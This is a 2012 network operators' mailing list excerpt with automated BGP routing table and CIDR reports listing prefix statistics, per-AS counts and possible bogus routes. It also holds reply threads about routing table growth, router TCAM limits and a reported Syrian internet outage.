100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 103959 Total RIPE prefixes after maximum aggregation: 55283 RIPE Deaggregation factor: 1.88 Prefixes being announced from the RIPE address blocks: 106121 Unique aggregates announced from the RIPE address blocks: 67350 RIPE Region origin ASes present in the Internet Routing Table: 16684 RIPE Prefixes per ASN: 6.36 RIPE Region origin ASes announcing only one prefix: 8081 RIPE Region transit ASes present in the Internet Routing Table: 2715 Average RIPE Region AS path length visible: 5.0 Max RIPE Region AS path length visible: 26 Number of RIPE region 32-bit ASNs visible in the Routing Table: 1731 Number of RIPE addresses announced to Internet: 636890756 Equivalent to 37 /8s, 246 /16s and 46 /24s Percentage of available RIPE address space announced: 92.6 RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 196608-199679 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 42631 Total LACNIC prefixes after maximum aggregation: 8417 LACNIC Deaggregation factor: 5.06 Prefixes being announced from the LACNIC address blocks: 45328 Unique aggregates announced from the LACNIC address blocks: 21794 LACNIC Region origin ASes present in the Internet Routing Table: 1612 LACNIC Prefixes per ASN: 28.12 LACNIC Region origin ASes announcing only one prefix: 430 LACNIC Region transit ASes present in the Internet Routing Table: 312 Average LACNIC Region AS path length visible: 4.7 Max LACNIC Region AS path length visible: 25 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 626 Number of LACNIC addresses announced to Internet: 112341928 Equivalent to 6 /8s, 178 /16s and 51 /24s Percentage of available LACNIC address space announced: 67.0 LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 262144-263167 plus ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 9521 Total AfriNIC prefixes after maximum aggregation: 2161 AfriNIC Deaggregation factor: 4.41 Prefixes being announced from the AfriNIC address blocks: 9962 Unique aggregates announced from the AfriNIC address blocks: 3408 AfriNIC Region origin ASes present in the Internet Routing Table: 551 AfriNIC Prefixes per ASN: 18.08 AfriNIC Region origin ASes announcing only one prefix: 170 AfriNIC Region transit ASes present in the Internet Routing Table: 123 Average AfriNIC Region AS path length visible: 4.5 Max AfriNIC Region AS path length visible: 25 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 6 Number of AfriNIC addresses announced to Internet: 41297664 Equivalent to 2 /8s, 118 /16s and 39 /24s Percentage of available AfriNIC address space announced: 41.0 AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4766 2721 11122 1244 Korea Telecom (KIX) 17974 2240 563 84 PT TELEKOMUNIKASI INDONESIA 7545 1705 301 88 TPG Internet Pty Ltd 4755 1616 388 163 TATA Communications formerly 9829 1305 1085 26 BSNL National Internet Backbo 9583 1162 88 509 Sify Limited 7552 1128 1062 11 Vietel Corporation 4808 1118 2053 318 CNCGROUP IP network: China169 24560 1037 385 165 Bharti Airtel Ltd., Telemedia 9498 989 294 73 BHARTI Airtel Ltd. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 7029 3435 998 172 Windstream Communications Inc 6389 3385 3773 186 bellsouth.net, inc. 18566 2088 382 181 Covad Communications 1785 1937 681 131 PaeTec Communications, Inc. 22773 1680 2911 122 Cox Communications, Inc. 20115 1649 1571 615 Charter Communications 4323 1577 1028 383 Time Warner Telecom 30036 1390 270 779 Mediacom Communications Corp 7018 1247 10039 819 AT&T WorldNet Services 11492 1192 217 350 Cable One Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 8402 1645 544 16 Corbina telecom 2118 1023 97 14 EUnet/RELCOM Autonomous Syste 12479 799 743 92 Uni2 Autonomous System 34984 730 189 174 BILISIM TELEKOM 6830 711 2302 445 UPC Distribution Services 31148 705 37 9 FreeNet ISP 20940 688 223 540 Akamai Technologies European 13188 635 100 10 Educational Network 8551 577 364 61 Bezeq International 3320 499 8443 409 Deutsche Telekom AG Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 10620 2010 348 208 TVCABLE BOGOTA 28573 1986 1212 87 NET Servicos de Comunicao S.A 6503 1523 418 66 AVANTEL, S.A. 8151 1463 3044 345 UniNet S.A. de C.V. 7303 1458 934 196 Telecom Argentina Stet-France 6458 856 81 15 GUATEL 27947 717 74 94 Telconet S.A 11172 643 91 74 Servicios Alestra S.A de C.V 3816 596 250 83 Empresa Nacional de Telecomun 22047 583 326 15 VTR PUNTO NET S.A. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 8452 996 958 13 TEDATA 24863 863 274 32 LINKdotNET AS number 6713 509 650 19 Itissalat Al-MAGHRIB 36998 483 48 3 MOBITEL 24835 286 80 8 RAYA Telecom - Egypt 3741 262 905 223 The Internet Solution 12258 197 28 62 Vodacom Internet Company 29975 191 667 21 Vodacom 16637 169 664 86 MTN Network Solutions 29571 160 15 15 Ci Telecom Autonomous system Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 7029 3435 998 172 Windstream Communications Inc 6389 3385 3773 186 bellsouth.net, inc. 4766 2721 11122 1244 Korea Telecom (KIX) 17974 2240 563 84 PT TELEKOMUNIKASI INDONESIA 18566 2088 382 181 Covad Communications 10620 2010 348 208 TVCABLE BOGOTA 28573 1986 1212 87 NET Servicos de Comunicao S.A 1785 1937 681 131 PaeTec Communications, Inc. 7545 1705 301 88 TPG Internet Pty Ltd 22773 1680 2911 122 Cox Communications, Inc. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 6389 3385 3199 bellsouth.net, inc. 17974 2240 2156 PT TELEKOMUNIKASI INDONESIA 18566 2088 1907 Covad Communications 28573 1986 1899 NET Servicos de Comunicao S.A 1785 1937 1806 PaeTec Communications, Inc. 10620 2010 1802 TVCABLE BOGOTA 8402 1645 1629 Corbina telecom 7545 1705 1617 TPG Internet Pty Ltd 22773 1680 1558 Cox Communications, Inc. 4766 2721 1477 Korea Telecom (KIX) Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 59407 UNALLOCATED 5.134.16.0/21 51167 Giga-Hosting GmbH 59457 UNALLOCATED 5.149.64.0/19 35567 DASTO semtel d.o.o. 15132 UNALLOCATED 12.9.150.0/24 7018 AT&T WorldNet Servic 25639 UNALLOCATED 12.41.169.0/24 7018 AT&T WorldNet Servic 13317 UNALLOCATED 12.44.10.0/24 7018 AT&T WorldNet Servic 23502 UNALLOCATED 12.44.44.0/24 7018 AT&T WorldNet Servic 17300 UNALLOCATED 12.45.103.0/24 7018 AT&T WorldNet Servic 17300 UNALLOCATED 12.45.110.0/24 701 UUNET Technologies, 16476 UNALLOCATED 12.46.27.0/24 7018 AT&T WorldNet Servic 14764 UNALLOCATED 12.108.237.0/24 7018 AT&T WorldNet Servic Complete listing at http://thyme.rand.apnic.net/current/data-badAS Prefixes from private and non-routed address space (Global) ----------------------------------------------------------- Prefix Origin AS Description 198.18.0.0/15 14744 Internap Network Services Complete listing at http://thyme.rand.apnic.net/current/data-dsua Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 5.152.176.0/24 25577 C4L main AS 5.153.64.0/19 12703 edNETs Autonomous System 5.154.0.0/23 56465 Sistem Soft Network SRL 14.192.0.0/22 45464 Room 201, TGU Bldg 14.192.4.0/22 45464 Room 201, TGU Bldg 14.192.8.0/22 45464 Room 201, TGU Bldg 14.192.12.0/22 45464 Room 201, TGU Bldg 14.192.16.0/22 45464 Room 201, TGU Bldg 14.192.20.0/22 45464 Room 201, TGU Bldg 14.192.24.0/22 45464 Room 201, TGU Bldg Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:19 /9:12 /10:28 /11:82 /12:236 /13:473 /14:844 /15:1524 /16:12297 /17:6372 /18:10763 /19:20919 /20:29792 /21:31641 /22:41286 /23:39374 /24:218584 /25:1212 /26:1472 /27:854 /28:163 /29:60 /30:18 /31:0 /32:23 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 7029 2774 3435 Windstream Communications Inc 18566 2038 2088 Covad Communications 6389 1865 3385 bellsouth.net, inc. 8402 1343 1645 Corbina telecom 30036 1325 1390 Mediacom Communications Corp 11492 1155 1192 Cable One 22773 1107 1680 Cox Communications, Inc. 6503 1051 1523 AVANTEL, S.A. 1785 1044 1937 PaeTec Communications, Inc. 7011 930 1191 Citizens Utilities Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:577 2:737 3:1 4:13 5:153 6:3 8:438 12:2012 13:1 14:640 15:11 16:3 17:6 20:24 23:196 24:1796 27:1340 31:1018 32:56 33:2 34:2 36:8 37:662 38:826 39:1 40:134 41:2894 42:142 44:3 46:1524 47:2 49:432 50:558 52:13 54:14 55:8 56:1 57:31 58:983 59:529 60:244 61:1337 62:920 63:2034 64:4250 65:2245 66:4497 67:2014 68:1157 69:3201 70:988 71:514 72:1860 74:2603 75:490 76:334 77:939 78:921 79:492 80:1233 81:947 82:630 83:535 84:506 85:1150 86:423 87:928 88:347 89:1673 90:303 91:5039 92:581 93:1300 94:1560 95:1248 96:401 97:323 98:878 99:39 100:22 101:258 103:1288 105:464 106:115 107:189 108:384 109:1461 110:783 111:936 112:429 113:641 114:657 115:908 116:919 117:730 118:902 119:1231 120:356 121:801 122:1652 123:1167 124:1379 125:1260 128:551 129:185 130:267 131:632 132:300 133:22 134:247 135:61 136:215 137:241 138:334 139:177 140:496 141:253 142:432 143:370 144:490 145:77 146:510 147:283 148:770 149:319 150:149 151:186 152:473 153:176 154:19 155:406 156:222 157:381 158:190 159:628 160:341 161:264 162:379 163:192 164:674 165:413 166:588 167:529 168:914 169:127 170:900 171:149 172:5 173:1734 174:612 175:438 176:569 177:948 178:1641 180:1317 181:112 182:997 183:233 184:555 186:2040 187:1090 188:1370 189:1568 190:6121 192:6016 193:5542 194:4488 195:3210 196:1210 197:177 198:3681 199:4936 200:5991 201:1966 202:8695 203:8668 204:4392 205:2545 206:2791 207:2827 208:4046 209:3628 210:2783 211:1564 212:1973 213:1791 214:875 215:85 216:5085 217:1568 218:545 219:337 220:1222 221:572 222:336 223:347 End of report From valdis.kletnieks at vt.edu Fri Jul 20 15:04:36 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 20 Jul 2012 16:04:36 -0400 Subject: Weekly Routing Table Report In-Reply-To: Your message of "Sat, 21 Jul 2012 05:10:41 +1000." <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> Message-ID: <36781.1342814676@turing-police.cc.vt.edu> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said: > This is an automated weekly mailing describing the state of the Internet > Routing Table as seen from APNIC's router in Japan. > BGP routing table entries examined: 418048 So, whatever happened to that whole "the internet will catch fire when we get to 280K routing table entries" or whatever it was? :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From djahandarie at gmail.com Fri Jul 20 15:10:40 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Fri, 20 Jul 2012 16:10:40 -0400 Subject: Weekly Routing Table Report In-Reply-To: <36781.1342814676@turing-police.cc.vt.edu> References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> Message-ID: On Fri, Jul 20, 2012 at 4:04 PM, wrote: > So, whatever happened to that whole "the internet will catch fire when > we get to 280K routing table entries" or whatever it was? :) But what will happen when we have 4294967295 entries? -- Darius Jahandarie From patrick at ianai.net Fri Jul 20 15:16:59 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Fri, 20 Jul 2012 16:16:59 -0400 Subject: Weekly Routing Table Report In-Reply-To: References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> Message-ID: On Jul 20, 2012, at 16:10 , Darius Jahandarie wrote: > On Fri, Jul 20, 2012 at 4:04 PM, wrote: >> So, whatever happened to that whole "the internet will catch fire when >> we get to 280K routing table entries" or whatever it was? :) > > But what will happen when we have 4294967295 entries? Nothing. But when we hit 4294967296.... =) -- TTFN, patrick From ron at spawar.navy.mil Fri Jul 20 15:30:06 2012 From: ron at spawar.navy.mil (Ron Broersma) Date: Fri, 20 Jul 2012 13:30:06 -0700 Subject: Weekly Routing Table Report In-Reply-To: <36781.1342814676@turing-police.cc.vt.edu> References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> Message-ID: <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote: > On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said: >> BGP routing table entries examined: 418048 > So, whatever happened to that whole "the internet will catch fire when > we get to 280K routing table entries" or whatever it was? :) We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes. -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 6127 bytes Desc: not available URL: From jared at puck.nether.net Fri Jul 20 15:40:54 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 20 Jul 2012 16:40:54 -0400 Subject: Weekly Routing Table Report In-Reply-To: <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> Message-ID: <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net> On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote: > > On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote: >> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said: >>> BGP routing table entries examined: 418048 >> So, whatever happened to that whole "the internet will catch fire when >> we get to 280K routing table entries" or whatever it was? :) > > We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes. I think you mean 512k IPv4 with 256k of IPv6 (taking double space). Make sure you check your tcam profiles :) - Jared From valdis.kletnieks at vt.edu Fri Jul 20 15:55:12 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 20 Jul 2012 16:55:12 -0400 Subject: Weekly Routing Table Report In-Reply-To: Your message of "Fri, 20 Jul 2012 16:16:59 -0400." References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> Message-ID: <40383.1342817712@turing-police.cc.vt.edu> On Fri, 20 Jul 2012 16:16:59 -0400, "Patrick W. Gilmore" said: > On Jul 20, 2012, at 16:10 , Darius Jahandarie wrote: > > On Fri, Jul 20, 2012 at 4:04 PM, wrote: > >> So, whatever happened to that whole "the internet will catch fire when > >> we get to 280K routing table entries" or whatever it was? :) > > > > But what will happen when we have 4294967295 entries? > > Nothing. But when we hit 4294967296.... By that point router vendors will hopefully have moved to 64-bit CPUs. 18446744073709551616 routes will hopefully not happen until after I retire, so you young whippersnappers will be on your own on that one. ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From joelja at bogus.com Fri Jul 20 16:05:43 2012 From: joelja at bogus.com (Joel jaeggli) Date: Fri, 20 Jul 2012 14:05:43 -0700 Subject: Weekly Routing Table Report In-Reply-To: <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net> References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net> Message-ID: <5009C827.4090600@bogus.com> On 7/20/12 13:40 , Jared Mauch wrote: > > On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote: > >> >> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote: >>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said: >>>> BGP routing table entries examined: 418048 >>> So, whatever happened to that whole "the internet will catch fire when >>> we get to 280K routing table entries" or whatever it was? :) >> >> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes. > > I think you mean 512k IPv4 with 256k of IPv6 (taking double space). if you're still on a platform with 40Mbit cams it's beginning look kinda tight as an internet router. you've probably got less than a year to figure out what to do about this. an f10 ej linecard cam paritioning scheme for example looks something like. CamSize : 40-Meg : Current Settings Profile Name : default Microcode Name : Default L2FIB : 15K entries Learn : 1K entries L2ACL : 5K entries System Flow : 102 entries Qos : 500 entries Frrp : 102 entries L2pt : 266 entries PPVlan : 100 entries IPv4FIB : 512K entries IPv4ACL : 16K entries IPv4Flow : 24K entries Mcast Fib/Acl : 9K entries Pbr : 1K entries Qos : 10K entries System Flow : 4K entries EgL2ACL : 2K entries EgIpv4ACL : 4K entries Mpls : 60K entries IPv6FIB : 12K entries IPv6ACL : 6K entries IPv6Flow : 6K entries Mcast Fib/Acl : 3K entries Pbr : 0K entries Qos : 1K entries System Flow : 2K entries EgIpv6ACL : 1K entries GenEgACL : 0.5K entries IPv4FHOP : 4K entries IPv6FHOP : 4K entries IPv4/IPv6NHOP : 12K entries > Make sure you check your tcam profiles :) > > - Jared > > > From thepacketmaster at hotmail.com Fri Jul 20 17:08:25 2012 From: thepacketmaster at hotmail.com (James Smith ) Date: Fri, 20 Jul 2012 22:08:25 +0000 Subject: Hearing Syria internet cut Message-ID: I'm curious to know what method people use to monitor the changes in the BGP system? Any recommendations? -----Original Message----- From: Andree Toonk Date: Fri, 20 Jul 2012 06:21:21 To: Cc: Subject: Re: Hearing Syria internet cut .-- My secret spy satellite informs me that at 12-07-19 10:00 PM? George Bonser wrote: > Can anyone confirm? Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19). Cheers, ?Andree From surfer at mauigateway.com Fri Jul 20 18:30:58 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 20 Jul 2012 16:30:58 -0700 Subject: Hearing Syria internet cut Message-ID: <20120720163058.A24C068A@m0005296.ppops.net> --- thepacketmaster at hotmail.com wrote: From: "James Smith " I'm curious to know what method people use to monitor the changes in the BGP system? Any recommendations? ------------------------------------------ There're many. Look in the archives. For this one, though: http://www.renesys.com/blog/2012/07/syria-leaves-the-internet.shtml scott From marka at isc.org Fri Jul 20 20:41:12 2012 From: marka at isc.org (Mark Andrews) Date: Sat, 21 Jul 2012 11:41:12 +1000 Subject: Weekly Routing Table Report In-Reply-To: Your message of "Fri, 20 Jul 2012 16:10:40 -0400." References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> Message-ID: <20120721014112.E864222D1E83@drugs.dv.isc.org> In message , Darius Jahandarie writes: > On Fri, Jul 20, 2012 at 4:04 PM, wrote: > > So, whatever happened to that whole "the internet will catch fire when > > we get to 280K routing table entries" or whatever it was? :) > > But what will happen when we have 4294967295 entries? We we long ago have switch to routers that are capable of handling more or we will succeed in making multi homing work well enough with PA addresses that we don't get there. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From cidr-report at potaroo.net Fri Jul 20 17:00:00 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 20 Jul 2012 22:00:00 GMT Subject: The Cidr Report Message-ID: <201207202200.q6KM002w040846@wattle.apnic.net> This report has been generated at Fri Jul 20 21:10:01 2012 AEST. The report analyses the BGP Routing Table of AS2.0 router and generates a report on aggregation potential within the table. Check http://www.cidr-report.org for a current version of this report. Recent Table History Date Prefixes CIDR Agg 13-07-12 418251 242235 14-07-12 419241 242041 15-07-12 419351 241919 16-07-12 419198 241935 17-07-12 419152 241935 18-07-12 0 241935 19-07-12 0 241935 20-07-12 0 241935 AS Summary 0 Number of ASes in routing system 0 Number of ASes announcing only one prefix 3388 Largest number of prefixes announced by an AS AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc. 0 Largest address span announced by an AS (/32s) ????? : BELLSOUTH-NET-BLK - BellSouth.net Inc. Aggregation Summary The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes'). --- 20Jul12 --- ASnum NetsNow NetsAggr NetGain % Gain Description Table 419152 241935 177217 42.3% All ASes AS6389 3388 189 3199 94.4% BELLSOUTH-NET-BLK - BellSouth.net Inc. AS28573 2007 279 1728 86.1% NET Servicos de Comunicao S.A. AS17974 2217 529 1688 76.1% TELKOMNET-AS2-AP PT Telekomunikasi Indonesia AS7029 3340 1669 1671 50.0% WINDSTREAM - Windstream Communications Inc AS18566 2088 417 1671 80.0% COVAD - Covad Communications Co. AS22773 1664 132 1532 92.1% ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc. AS4766 2741 1282 1459 53.2% KIXS-AS-KR Korea Telecom AS10620 1990 598 1392 69.9% Telmex Colombia S.A. AS4323 1576 387 1189 75.4% TWTC - tw telecom holdings, inc. AS1785 1936 814 1122 58.0% AS-PAETEC-NET - PaeTec Communications, Inc. AS4755 1614 575 1039 64.4% TATACOMM-AS TATA Communications formerly VSNL is Leading ISP AS2118 1023 15 1008 98.5% RELCOM-AS OOO "NPO Relcom" AS7303 1454 452 1002 68.9% Telecom Argentina S.A. AS7552 1128 238 890 78.9% VIETEL-AS-AP Vietel Corporation AS8151 1468 669 799 54.4% Uninet S.A. de C.V. AS6458 853 56 797 93.4% Telgua AS18101 944 159 785 83.2% RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI AS17908 828 60 768 92.8% TCISL Tata Communications AS4808 1117 352 765 68.5% CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network AS9394 889 161 728 81.9% CRNET CHINA RAILWAY Internet(CRNET) AS13977 839 123 716 85.3% CTELCO - FAIRPOINT COMMUNICATIONS, INC. AS855 695 53 642 92.4% CANET-ASN-4 - Bell Aliant Regional Communications, Inc. AS8452 1106 466 640 57.9% TE-AS TE-AS AS3356 1105 470 635 57.5% LEVEL3 Level 3 Communications AS17676 693 76 617 89.0% GIGAINFRA Softbank BB Corp. AS4780 842 242 600 71.3% SEEDNET Digital United Inc. AS19262 998 405 593 59.4% VZGNI-TRANSIT - Verizon Online LLC AS22561 1008 415 593 58.8% DIGITAL-TELEPORT - Digital Teleport Inc. AS24560 1037 450 587 56.6% AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services AS3549 988 433 555 56.2% GBLX Global Crossing Ltd. Total 43576 12166 31410 72.1% Top 30 total Possible Bogus Routes 10.86.64.32/30 AS65530 -Private Use AS- 10.86.64.36/30 AS65530 -Private Use AS- 10.86.65.32/30 AS65530 -Private Use AS- 10.86.65.36/30 AS65530 -Private Use AS- 10.255.255.0/30 AS65530 -Private Use AS- 10.255.255.4/30 AS65530 -Private Use AS- 10.255.255.8/30 AS65530 -Private Use AS- 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. 41.222.80.0/21 AS37110 moztel-as 41.222.82.0/24 AS37110 moztel-as 41.222.83.0/24 AS37110 moztel-as 41.222.85.0/24 AS37110 moztel-as 41.222.86.0/24 AS37110 moztel-as 41.222.87.0/24 AS37110 moztel-as 41.223.108.0/22 AS36966 EDL_AS Edgenet AS 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV 64.66.32.0/20 AS18864 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION 66.207.32.0/20 AS23011 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. 72.35.224.0/22 AS30097 NUWAVE - NuWave 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. 72.35.232.0/21 AS30097 NUWAVE - NuWave 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.115.124.0/23 AS46540 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. 91.102.192.0/21 